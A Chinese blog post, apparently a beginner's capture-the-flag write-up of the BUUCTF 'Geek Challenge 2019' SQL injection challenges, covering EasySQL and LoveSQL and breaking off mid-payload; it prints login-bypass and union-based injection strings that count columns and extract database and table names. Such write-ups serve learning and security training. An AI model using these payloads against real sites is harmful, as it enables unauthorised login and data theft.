BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL

zhangchen 好物分享

小白一个,记录一下解题过程,如有错误请指正!
一、EasySQL
1.这里我们使用一句话万能密码就可以了,记得加上#
1' or '1'='1'#

2.登录就可以拿到flag
 
二、LoveSQL
        网页里说用sqlmap是没有灵魂滴,但是还是手痒试了一下,发现什么都扫不出来,可能是我太菜了能力还没到家,希望有大佬能指点一下~
1.我们只能运用灵魂了,用万能句尝试一下,发现登录进来了,但是没有flag

 2.猜测flag应该是放在某个字段里了,我们用联合注入(union)看一下列数
1' union select 1,2,3#

登录成功,列数再加1,发现报错了,说明列数有三列,第二第三列有回显
1' union select 1,2,3,4#

 3.开始爆数据库
1' union select 1,2,database()#

4.数据库名为geek,爆表名
1' union select 1,2,group_concat(table_name) from information

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL最先出现在Python成神之路

版权声明:
作者:zhangchen
链接:https://www.techfm.club/p/27266.html
来源:TechFM
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>